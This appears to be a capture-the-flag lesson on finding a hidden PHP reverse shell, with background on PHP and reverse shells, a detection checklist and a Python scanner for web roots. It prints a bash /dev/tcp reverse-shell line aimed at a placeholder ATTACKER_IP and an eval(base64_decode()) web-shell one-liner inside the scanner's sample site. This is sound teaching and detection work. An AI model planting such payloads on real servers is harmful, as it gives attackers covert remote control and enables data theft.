In the Shadow of Code - Hunting the Reverse Shell

In cybersecurity, not everything is visible or tangible at first glance; sometimes, danger lurks in seemingly innocent lines of code, waiting for the right moment to open a backdoor. Today, you'll learn to be a hunter in that shadow.

This challenge invites you to discover a malicious payload hidden within a basic PHP website. Your mission is to find the absolute path of this hidden threat.

PHP: The Server-Side Language

PHP (Hypertext Preprocessor) is one of the most widely used programming languages on the web. It's an interpreted language that runs on the server side and generates dynamic web pages. Whenever you visit a site with dynamic content, there's a good chance PHP is behind it.

What is PHP used for?

  • Creating web pages that interact with databases
  • Generating dynamic content based on user or context
  • Handling forms and sessions
  • Building APIs and web services

Client-Server Architecture

On the web, every exchange has two roles:

  • Client: the browser requesting information (you)
  • Server: the machine that processes the request, runs PHP, and sends the response

The server executes the PHP code and returns the result in HTML for the client to display. Communication happens via protocols like HTTP or HTTPS.

What is a Reverse Shell?

A reverse shell is a technique used by attackers to gain remote control over a compromised server or machine.

Instead of the attacker connecting directly to the server (which may be blocked by firewalls), the server connects to the attacker, opening a communication channel where the attacker can execute commands as if they were on the local terminal.

What is a reverse shell used for?

  • Maintaining covert remote access
  • Evading firewalls or network restrictions
  • Controlling compromised systems to steal information, modify files, or move laterally

What does a PHP reverse shell payload look like?

A PHP reverse shell payload is essentially code that executes operating system commands and opens network connections to an attacker.

A basic example (no spoilers) might be:

    <?php
    exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'");
    ?>

This code runs an interactive shell that connects to the attacker at the specified IP and port.

How to identify a malicious payload?

  • PHP files containing suspicious functions: exec(), shell_exec(), system(), passthru(), popen(), proc_open()
  • Obfuscated or injected code (excessive use of base64_decode(), eval())
  • Undocumented or out-of-place files or paths in the site structure
  • Presence of unusual outbound network connections
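The checklist above can be turned into a first-pass triage tool. The following Python scanner is an added example written for this lesson, not part of the challenge material or any real project: it walks a web root, reads every PHP file (hidden directories included, since out-of-place paths are one of the indicators), and reports the absolute path of each file that contains a command-execution function, an obfuscation helper, a socket-opening call, or the bash /dev/tcp redirection shown earlier. The sample site it builds in a temporary directory, including the file names and the hidden payload location, is constructed for the demo; the indicator lists are the lesson's, extended with a few common obfuscation and socket functions as an assumption.

```python
"""Static triage of a PHP tree for reverse-shell indicators (added example)."""
import os
import re
import tempfile

# Indicators from the lesson's checklist: command-execution functions and
# obfuscation helpers. gzinflate/str_rot13 and the socket functions are
# additions assumed to be worth flagging, not part of the original list.
EXEC_FUNCS = ("exec", "shell_exec", "system", "passthru", "popen", "proc_open")
OBFUSCATION_FUNCS = ("base64_decode", "eval", "gzinflate", "str_rot13")
SOCKET_FUNCS = ("fsockopen", "socket_create", "stream_socket_client")

PATTERNS = {
    "exec-function": re.compile(r"\b(" + "|".join(EXEC_FUNCS) + r")\s*\(", re.I),
    "obfuscation": re.compile(r"\b(" + "|".join(OBFUSCATION_FUNCS) + r")\s*\(", re.I),
    "socket-open": re.compile(r"\b(" + "|".join(SOCKET_FUNCS) + r")\s*\(", re.I),
    # bash's /dev/tcp/<host>/<port> pseudo-device, as used in the lesson's payload
    "dev-tcp-redirect": re.compile(r"/dev/tcp/[^\s/]+/[^\s/'\"]+"),
}


def scan_php_source(text):
    """Return the sorted list of indicator names present in one PHP source string."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(text))


def scan_tree(root):
    """Walk `root`, scan every PHP file and return {absolute_path: [indicators]}
    for the files that contain at least one indicator."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.abspath(os.path.join(dirpath, fname))
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_php_source(fh.read())
            except OSError:
                continue  # unreadable file: skip, keep scanning the rest
            if found:
                hits[path] = found
    return hits


# Constructed sample site: two benign pages, a payload hidden in a dotted
# cache directory, and an obfuscated loader. Names and contents are made up.
SAMPLE_SITE = {
    "index.php": "<?php echo '<h1>Welcome</h1>'; include 'lib/db.php'; ?>",
    "lib/db.php": "<?php $db = new PDO('sqlite:site.db'); ?>",
    "uploads/.cache/thumb.php": (
        "<?php\n"
        "exec(\"/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'\");\n"
        "?>"
    ),
    "admin/tools.php": "<?php eval(base64_decode($_GET['c'])); ?>",
}


def build_sample_site(base):
    """Write SAMPLE_SITE under `base` and return `base`."""
    for rel, body in SAMPLE_SITE.items():
        full = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return base


def demo():
    """Build the sample site in a temp dir, scan it, print absolute paths of
    flagged files and return the findings keyed by path relative to the root."""
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_site(tmp)
        hits = scan_tree(root)
        for path, found in sorted(hits.items()):
            print(f"{path}: {', '.join(found)}")
        return {os.path.relpath(p, root): found for p, found in hits.items()}


if __name__ == "__main__":
    demo()
```

Run against a real web root, `scan_tree("/var/www/html")` prints candidate absolute paths; every hit still needs a manual read, because legitimate admin tooling also calls `system()` and `base64_decode()` shows up in harmless image handling. The value of the scanner is in narrowing a large tree to a handful of files, and in catching the hidden directory that a casual listing would skip.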

Your goal is not just to understand what PHP is or what a reverse shell is. Your challenge is to analyze the code, detect where the payload might be, and determine the absolute path of the malicious file.

This is the day to sharpen your analytical eye and your patience, so that the silence of the code lines reveals what an attacker tried to hide.